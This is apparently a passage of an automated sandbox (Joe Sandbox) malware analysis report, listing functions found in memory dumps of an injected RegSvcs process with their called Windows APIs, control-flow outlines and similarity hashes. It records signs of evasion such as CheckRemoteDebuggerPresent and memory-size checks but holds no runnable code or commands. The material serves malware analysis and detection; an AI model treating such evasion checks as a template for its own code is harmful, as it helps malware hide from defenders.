                                                control_flow_graph 1079 6b2e284-6b2e2f6 1081 6b2e301-6b2e308 1079->1081 1082 6b2e2f8-6b2e2fe 1079->1082 1083 6b2e313-6b2e34b 1081->1083 1084 6b2e30a-6b2e310 1081->1084 1082->1081 1085 6b2e353-6b2e3b2 CreateWindowExW 1083->1085 1084->1083 1086 6b2e3b4-6b2e3ba 1085->1086 1087 6b2e3bb-6b2e3f3 1085->1087 1086->1087 1091 6b2e400 1087->1091 1092 6b2e3f5-6b2e3f8 1087->1092 1093 6b2e401 1091->1093 1092->1091 1093->1093
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06B2E3A2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: c27fa6aba8541c31ee077bb336869095917820e8b8e1540987976486df40a6e9
                                                • Instruction ID: 00778f1d46859d2e79ed2b50cd0fb8f7687aa37367959fbd366f82419e012149
                                                • Opcode Fuzzy Hash: c27fa6aba8541c31ee077bb336869095917820e8b8e1540987976486df40a6e9
                                                • Instruction Fuzzy Hash: B251D4B5D003599FDB24CF9AC884ADEBBF5FF48310F64812AE819AB210D7749845CF91
                                                Function 06B2E290 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1094 6b2e290-6b2e2f6 1095 6b2e301-6b2e308 1094->1095 1096 6b2e2f8-6b2e2fe 1094->1096 1097 6b2e313-6b2e3b2 CreateWindowExW 1095->1097 1098 6b2e30a-6b2e310 1095->1098 1096->1095 1100 6b2e3b4-6b2e3ba 1097->1100 1101 6b2e3bb-6b2e3f3 1097->1101 1098->1097 1100->1101 1105 6b2e400 1101->1105 1106 6b2e3f5-6b2e3f8 1101->1106 1107 6b2e401 1105->1107 1106->1105 1107->1107
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06B2E3A2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 11e6e58d9781a6eecfe9083808a20d597cc4c02245ae7f986920e0cc10a37bc3
                                                • Instruction ID: a0726c2b35bc7da1f4269492188182e8ceb8e1ab21a74588538303529d19a6a3
                                                • Opcode Fuzzy Hash: 11e6e58d9781a6eecfe9083808a20d597cc4c02245ae7f986920e0cc10a37bc3
                                                • Instruction Fuzzy Hash: 9C41C1B1D003599FDB25CF9AC884ADEBBF5FF48310F24812AE818AB210D775A845CF91
                                                Function 06F70C70 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1108 6f70c70-6f70cac 1109 6f70cb2-6f70cb7 1108->1109 1110 6f70d5c-6f70d7c 1108->1110 1111 6f70d0a-6f70d42 CallWindowProcW 1109->1111 1112 6f70cb9-6f70cf0 1109->1112 1116 6f70d7f-6f70d8c 1110->1116 1113 6f70d44-6f70d4a 1111->1113 1114 6f70d4b-6f70d5a 1111->1114 1119 6f70cf2-6f70cf8 1112->1119 1120 6f70cf9-6f70d08 1112->1120 1113->1114 1114->1116 1119->1120 1120->1116
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 06F70D31
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860857393.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6f70000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 7a5cc200fa1a329819ac8cf91150715e54f9cebcf84e6820f5316428b283423c
                                                • Instruction ID: 43f09549269907fc30fe4652e9902eb27a634a0d40820b78f3c43e8bd2ad1e42
                                                • Opcode Fuzzy Hash: 7a5cc200fa1a329819ac8cf91150715e54f9cebcf84e6820f5316428b283423c
                                                • Instruction Fuzzy Hash: CB41E6B5D00309CFDB54CF99C488AAABBF5FF88314F248459D519AB321D775A841CFA4
                                                Function 0127F3A4 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1122 127f3a4-127f3c1 1125 127f3c7-127f454 GlobalMemoryStatusEx 1122->1125 1126 127f3c3-127f3c6 1122->1126 1129 127f456-127f45c 1125->1129 1130 127f45d-127f485 1125->1130 1129->1130
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 0127F447
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3852735375.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1270000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 08974382a42924f61305f5a356ffacc6fbfb3e705fe2d6d342d95060aa758725
                                                • Instruction ID: c89fa822046642d3eed8009d613328a839ed954502af061a708f7f99b9941d7b
                                                • Opcode Fuzzy Hash: 08974382a42924f61305f5a356ffacc6fbfb3e705fe2d6d342d95060aa758725
                                                • Instruction Fuzzy Hash: A221A971D042598FDB10DFAAD804BEEBBF4EF48210F10856AD918B7240D7789841CFA1
                                                Function 01277ECB Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1133 1277ecb-1277f54 CheckRemoteDebuggerPresent 1135 1277f56-1277f5c 1133->1135 1136 1277f5d-1277f98 1133->1136 1135->1136
                                                APIs
                                                • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01277F47
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3852735375.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1270000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: CheckDebuggerPresentRemote
                                                • String ID:
                                                • API String ID: 3662101638-0
                                                • Opcode ID: 6009aaf50fd3bd1acff37ea48a4bb84c65d3d69ae26c0f85baed0495b295c268
                                                • Instruction ID: d255591140e1c4693b08ac307e4d1549c7ba6598be69c65d75886c3d90d88f06
                                                • Opcode Fuzzy Hash: 6009aaf50fd3bd1acff37ea48a4bb84c65d3d69ae26c0f85baed0495b295c268
                                                • Instruction Fuzzy Hash: 912145B1D012598FDB10CFAAD484BEEFBF4EF89310F14846AE459A3250C778AA45CF61
                                                Function 01277ED0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1139 1277ed0-1277f54 CheckRemoteDebuggerPresent 1141 1277f56-1277f5c 1139->1141 1142 1277f5d-1277f98 1139->1142 1141->1142
                                                APIs
                                                • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01277F47
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3852735375.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1270000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: CheckDebuggerPresentRemote
                                                • String ID:
                                                • API String ID: 3662101638-0
                                                • Opcode ID: 265786467cb43f6daeb10ce639dece57645c94589dc36514ef22fa505d24de86
                                                • Instruction ID: a9b69d8ed092eadb802b450ec71e453e0ad88001980a541091cc30d94570effe
                                                • Opcode Fuzzy Hash: 265786467cb43f6daeb10ce639dece57645c94589dc36514ef22fa505d24de86
                                                • Instruction Fuzzy Hash: FA2137B1D012598FDB10CF9AD484BEEFBF4EF49210F14846AE459A3250D778A944CF61
                                                Function 06B23AD8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1145 6b23ad8-6b23adf 1146 6b23ae0-6b23b74 DuplicateHandle 1145->1146 1147 6b23b76-6b23b7c 1146->1147 1148 6b23b7d-6b23b9a 1146->1148 1147->1148
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06B23B67
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 723e0ae73321a9d06a2214d9d72549065e47b060841224738e71b202cfe55393
                                                • Instruction ID: ba2747b5d3f6322f1b9a31c86f04c050eb99fa13bc46f12c3af917a5cd0f856a
                                                • Opcode Fuzzy Hash: 723e0ae73321a9d06a2214d9d72549065e47b060841224738e71b202cfe55393
                                                • Instruction Fuzzy Hash: 8821E6B5D003599FDB10CFAAD984ADEFBF4EB48310F14841AE918A3350D378A944CFA5
                                                Function 06B23AE0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06B23B67
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 82b77d6ab0c8ecadf3542d2ba101780f8c16b79b709412237c8cc2f50e8dfe64
                                                • Instruction ID: 7d0843fce2353c2f4581f6e95daeb00977f52fb3791a5d3530f8d65737bcbf81
                                                • Opcode Fuzzy Hash: 82b77d6ab0c8ecadf3542d2ba101780f8c16b79b709412237c8cc2f50e8dfe64
                                                • Instruction Fuzzy Hash: B721C2B5D002599FDB10CFAAD984ADEBBF9EB48310F14841AE918A3350D378A944CFA5
                                                Function 0127F3E0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 0127F447
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3852735375.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1270000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: d14933ae9c1b714387e0981d9ef2cbf58a6628f344406d33aeb2b5d8e692fed5
                                                • Instruction ID: f793a99797480840aefd06294e11cadccd56f39dc1dd0500edf5927d651e18b4
                                                • Opcode Fuzzy Hash: d14933ae9c1b714387e0981d9ef2cbf58a6628f344406d33aeb2b5d8e692fed5
                                                • Instruction Fuzzy Hash: D91123B1C006599BDB10DF9AD544BDEFBF4EF48320F10812AD928A7240D778A945CFA5
                                                Function 06B2BE98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 06B2BEFE
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860388382.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b20000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: ebaf9f490be43dc685fef2e939686789eb5b5ee160817a9e79220658a20c362d
                                                • Instruction ID: 61a7ab1c8aae9cc9d62f4bd4fe3b55aac41ac033e496edf4dd0d934165b34e62
                                                • Opcode Fuzzy Hash: ebaf9f490be43dc685fef2e939686789eb5b5ee160817a9e79220658a20c362d
                                                • Instruction Fuzzy Hash: 081110B6C002498FCB20CF9AC444BDEFBF4EB88324F10846AD828A7610C379A545CFA1
                                                Function 06F722E0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 06F7320D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860857393.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6f70000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 1929723df58fd33f7aa619ee84e57648aef3acffe2d9b46cd457b8ba47b3477f
                                                • Instruction ID: f10e7e2c11d96e7ef6469a213e9315b17238b9e3c28749d8219b2167a4f5e1f9
                                                • Opcode Fuzzy Hash: 1929723df58fd33f7aa619ee84e57648aef3acffe2d9b46cd457b8ba47b3477f
                                                • Instruction Fuzzy Hash: 3F1115B5D043489FDB20DF9AD444BDEBBF4EB48310F20841AD519A7300D379A944CFA5
                                                Function 06F731B0 Relevance: 1.5, APIs: 1, Instructions: 41comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 06F7320D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860857393.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6f70000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: f93abba1ff54a7995d5bff6b2100c870cc665ef8699acf0225edfe944baf6985
                                                • Instruction ID: 04ed61e3f6cad06a6ab3ffd0bbb5b0d5d18990cc4848cfb1c8efc673b5acd3c7
                                                • Opcode Fuzzy Hash: f93abba1ff54a7995d5bff6b2100c870cc665ef8699acf0225edfe944baf6985
                                                • Instruction Fuzzy Hash: 821112B5D00748CFCB20DF9AD58479EFBF4EB48324F24891AD529A7250D378A984CFA5
                                                Function 06B4FED3 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                • Opcode ID: cc086f1f16e76bcad13e0faeaf12b3546be460635130b1328b0768dbf9612ef4
                                                • Instruction ID: 5e3b8087257629e7150c67ee13bed469684ef8fe18fe6a7355b94bff301a13aa
                                                • Opcode Fuzzy Hash: cc086f1f16e76bcad13e0faeaf12b3546be460635130b1328b0768dbf9612ef4
                                                • Instruction Fuzzy Hash: 2E21C674B043249FDB40AB78C814B6E7BF5AF4D700F0144AAE64ADB3A2DB359C00CB91
                                                Function 06B4FEF0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                • Opcode ID: 1e7963785dc590c145a2ecf3422982c8faa243315f473c1562dbfaec749626d5
                                                • Instruction ID: 199257e8b46c4412748062351fd6ce8eb24dfecbac0b910f22b8fd7ed659b48d
                                                • Opcode Fuzzy Hash: 1e7963785dc590c145a2ecf3422982c8faa243315f473c1562dbfaec749626d5
                                                • Instruction Fuzzy Hash: 25115E71B402249FDB44EF78C804B6E77F5AF49700F10446AE60AD73A0DB759D01CB90
                                                Function 06B44699 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Oq
                                                • API String ID: 0-643489707
                                                • Opcode ID: d5c22fec15be053c2e210bc46255b25b3f1e7f20b468716cd4db5714f6835e03
                                                • Instruction ID: 6fd8475f8dd735cd2d859d36c0bc4937b1e1636758c5658451d68949ec77ecf2
                                                • Opcode Fuzzy Hash: d5c22fec15be053c2e210bc46255b25b3f1e7f20b468716cd4db5714f6835e03
                                                • Instruction Fuzzy Hash: B1F05E70A10129DFDB10EF94E858BADBBF2FF84700F20015AE002A3294CBB45C42CF80
                                                Function 06B4CF48 Relevance: .8, Instructions: 796COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4dd3e30d47dc499d57dcf52024ca4eb49e62e112d8a125a1fc2533001f047dc2
                                                • Instruction ID: a60819a21ed5626562aca032d57e26bc1b45ba40fa16cdcf14fb649783897dfc
                                                • Opcode Fuzzy Hash: 4dd3e30d47dc499d57dcf52024ca4eb49e62e112d8a125a1fc2533001f047dc2
                                                • Instruction Fuzzy Hash: 73625C30A102098FCB55EF68D490A5EB7F2FF85350B20CA69D0459F359EB75ED86CB81
                                                Function 06B4ACC8 Relevance: .4, Instructions: 396COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e9a4f5b11dc2caab9fb32fdfab3edd0d0c0012e6686f36add4cf290c0070f4a9
                                                • Instruction ID: 53e9f900118f2375de7a3c95ff3d62afd4d593ab293f7fe57ffa48538fc52f7e
                                                • Opcode Fuzzy Hash: e9a4f5b11dc2caab9fb32fdfab3edd0d0c0012e6686f36add4cf290c0070f4a9
                                                • Instruction Fuzzy Hash: 27E19170E602098FDB65EF68D4806AEB7B6FF89310F208569D405EB349EB74DC46CB81
                                                Function 06B4C178 Relevance: .3, Instructions: 267COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0bed4e2f723f3b38fb551074c24fdef3d52ed255c372d123f4f27f148661128b
                                                • Instruction ID: 7d8ef6bcb0fad7f4e8933a5137a7bb8025563077ccdbdd6c13430e9095d8a6fb
                                                • Opcode Fuzzy Hash: 0bed4e2f723f3b38fb551074c24fdef3d52ed255c372d123f4f27f148661128b
                                                • Instruction Fuzzy Hash: DEA19BB4E112098FEFA0EFA8D890BADBBB2FB88710F105565D406E7395CB35EC419B51
                                                Function 06B48D50 Relevance: .2, Instructions: 231COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a09e84a7ec78bc1ccdd981a788a8a5fe7314728193d124d9dc9a2555a95eb088
                                                • Instruction ID: 837524c008e381021589486c1c8157b873de5ffc3e6b28d72a0eacc86fb0ec30
                                                • Opcode Fuzzy Hash: a09e84a7ec78bc1ccdd981a788a8a5fe7314728193d124d9dc9a2555a95eb088
                                                • Instruction Fuzzy Hash: CF916F70B5061A8FDB54EB69D890BAE77F2FF89310F1085A9C40AEB345EB709D418B91
                                                Function 06B45DE8 Relevance: .2, Instructions: 229COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4fda446ff0ae734cc7a2ccc7dc771e19c6d68350d2ff409899126a1382bc8f88
                                                • Instruction ID: 1089c3cfddbf10b6bcf65e1d3341c8903d27715c60fa8587b0ae305f5f2d9a48
                                                • Opcode Fuzzy Hash: 4fda446ff0ae734cc7a2ccc7dc771e19c6d68350d2ff409899126a1382bc8f88
                                                • Instruction Fuzzy Hash: 0661D2B2F505104FDB65AA7EC88066EBAEBEFD4220B144479D40ADB364DEB5DC0287D1
                                                Function 06B43EE2 Relevance: .2, Instructions: 226COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3ce9b96eb4eb385dce4d512212310bf0ffbaa751486c45f5476fc4fec43a4c6
                                                • Instruction ID: 173e793c9d3b1aefed49fe9881e58eb2d025788c848a106d92623ea0701f8bfc
                                                • Opcode Fuzzy Hash: f3ce9b96eb4eb385dce4d512212310bf0ffbaa751486c45f5476fc4fec43a4c6
                                                • Instruction Fuzzy Hash: B7815A70B106099FDB54EBA9D8907AEBBF3FF88310F148569D40ADB355EB319C528B81
                                                Function 06B44200 Relevance: .2, Instructions: 218COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b5d9de211a8d6d34aef5f8c8d19cfe16265a3bf9b453a2138a0efce83ce9973
                                                • Instruction ID: f9da45ed8becf627f031e0cf32aa9a8d3bfbfeb2bf10c4b810acf113ee0b501d
                                                • Opcode Fuzzy Hash: 0b5d9de211a8d6d34aef5f8c8d19cfe16265a3bf9b453a2138a0efce83ce9973
                                                • Instruction Fuzzy Hash: 3C912D70E102198FDF60DF68C890B9DBBB1FF89310F208599D549BB245EB74A985CF51
                                                Function 06B44218 Relevance: .2, Instructions: 210COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff6a81e0b4164f3f795424be8be647dd52771bb81862f9e5a30674bcea5df78a
                                                • Instruction ID: 2ef856699d956a4c6da687c04bf775c7142f10c0028ee200c667ce09a4bb8d0d
                                                • Opcode Fuzzy Hash: ff6a81e0b4164f3f795424be8be647dd52771bb81862f9e5a30674bcea5df78a
                                                • Instruction Fuzzy Hash: A2911B70E106198BEF60DF68C890B9DB7B1FF89310F208599D549BB245EB70AA85CF91
                                                Function 06B4EB10 Relevance: .2, Instructions: 202COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 81ca6c0665f781d2fc1d9adfb80fb143c0a21533cfabe6de0d2f5e3a394872d8
                                                • Instruction ID: 8aeb6986f41ee14ae60ab7098e210d34deadf5f08f2cd7cd59d3b4d2809f2821
                                                • Opcode Fuzzy Hash: 81ca6c0665f781d2fc1d9adfb80fb143c0a21533cfabe6de0d2f5e3a394872d8
                                                • Instruction Fuzzy Hash: ED714B70A102099FDB54EFA8D980AADBBF6FF88310F2485A9D055EB355DB30ED46CB50
                                                Function 06B4EB20 Relevance: .2, Instructions: 201COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9b1b0aec8606e806061fc5286bec334d4b943e6d95f8cc1963270f1b9b39a6f
                                                • Instruction ID: 8fa47c17147f3f30ffac04b4b8ffb8045346c0cf32c7e278ca68f49688f927d6
                                                • Opcode Fuzzy Hash: a9b1b0aec8606e806061fc5286bec334d4b943e6d95f8cc1963270f1b9b39a6f
                                                • Instruction Fuzzy Hash: E5714A70A002099FDB54EFA9D980AADBBF6FF88310F248569D015EB355DB30ED46CB50
                                                Function 06B4FC80 Relevance: .2, Instructions: 181COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e4e875bf5dafe38eaed79faf4462384663467cb11f34181eb46f77ab67ff887b
                                                • Instruction ID: d1b8dbf0777e2fe965c2e292ea429daaecf9b46dae7d126ace045fa3b286d5b5
                                                • Opcode Fuzzy Hash: e4e875bf5dafe38eaed79faf4462384663467cb11f34181eb46f77ab67ff887b
                                                • Instruction Fuzzy Hash: AB51D171E102059FDB14FB78E4886BEB7B6FF84311F1088A9E506D7351DB358855CB90
                                                Function 06B4F628 Relevance: .2, Instructions: 173COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 882af7d357eb8039ad09de30401a8f1107a14083b1d40401e7835ae0a33ac00d
                                                • Instruction ID: 41b6cad19f639851a394f32e97fdbc7bb322445906303f94fcc128f4d2c10e32
                                                • Opcode Fuzzy Hash: 882af7d357eb8039ad09de30401a8f1107a14083b1d40401e7835ae0a33ac00d
                                                • Instruction Fuzzy Hash: E951F7B0B202009FFF6076A9D85473F366EE7C9750F20546AE00AD7795DA7DCC4193A2
                                                Function 06B48D4D Relevance: .2, Instructions: 164COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca0772913e735a03bd79d79e7a7b72463fd55a11f0ab493c972f094d84572c26
                                                • Instruction ID: 3fd2315364ec2478ca6c76cbc0845e0b9f5fe1892abd4b577ccb155a4a9953ee
                                                • Opcode Fuzzy Hash: ca0772913e735a03bd79d79e7a7b72463fd55a11f0ab493c972f094d84572c26
                                                • Instruction Fuzzy Hash: A8514E70B906199FDB54EB69D890B6E77E7FBC8310F108569C40AEB349EA30DC418B91
